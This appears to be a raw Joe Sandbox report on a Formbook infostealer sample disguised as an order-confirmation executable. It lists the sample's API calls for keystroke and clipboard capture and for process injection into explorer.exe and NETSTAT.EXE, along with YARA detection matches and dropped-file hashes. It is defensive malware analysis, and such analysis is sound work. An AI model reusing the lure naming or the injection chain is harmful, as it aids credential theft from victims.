          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BA4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B90508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BBD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Order confirmation 64236000000025 26.01.2021.exe
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004181B0 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00418260 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004182E0 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004182DB NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041838A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E4B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E499D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E4A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E495F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E4AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E496D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E49760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E8260 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E82E0 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E838A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E82DB NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B942D5: CreateFileW,DeviceIoControl,CloseHandle,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B88F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B95778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_00406925
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B533B7
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B31663
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B523F5
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BB8400
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B66502
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B6265E
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5282A
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B689BF
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BB0A3A
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B66A74
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B8EDB2
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B40D06
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5CD51
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BB0EB7
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B98E44
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B66FE6
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B3B020
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B394E0
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5F409
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B4D45D
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B516B4
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B3F6A0
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B4F628
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B578C3
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5DBA5
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B51BA8
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B39C80
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B69CE5
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B4DD28
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B5BFD6
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B51FC0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C06A
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041A29C
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041BB53
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041BBBB
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00408C4B
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00408C50
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C4F3
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B493
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B666
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED28EC
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED20A8
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1B090
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EC1002
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E24120
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0F900
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED22AE
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ECDBD2
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3EBB0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED2B28
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ECD466
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1841F
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1D5E0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED25DD
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E32581
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED1D55
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E00D20
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED2D07
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED2EF7
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E26E30
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED1FF1
          Source: C:\Windows\explorer.exeCode function: 4_2_07027902
          Source: C:\Windows\explorer.exeCode function: 4_2_0702A302
          Source: C:\Windows\explorer.exeCode function: 4_2_07028362
          Source: C:\Windows\explorer.exeCode function: 4_2_0702E5B2
          Source: C:\Windows\explorer.exeCode function: 4_2_0702D7C7
          Source: C:\Windows\explorer.exeCode function: 4_2_0702C062
          Source: C:\Windows\explorer.exeCode function: 4_2_070278F9
          Source: C:\Windows\explorer.exeCode function: 4_2_0702A2FF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EBB53
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EA29C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D2D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D8C4B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D8C50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB493
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC4F3
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: String function: 00B41A36 appears 34 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: String function: 00B58B30 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: String function: 00B50D17 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: String function: 00E0B150 appears 35 times
          Source: lqqebhptsg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs Order confirmation 64236000000025 26.01.2021.exe
          Source: Order confirmation 64236000000025 26.01.2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
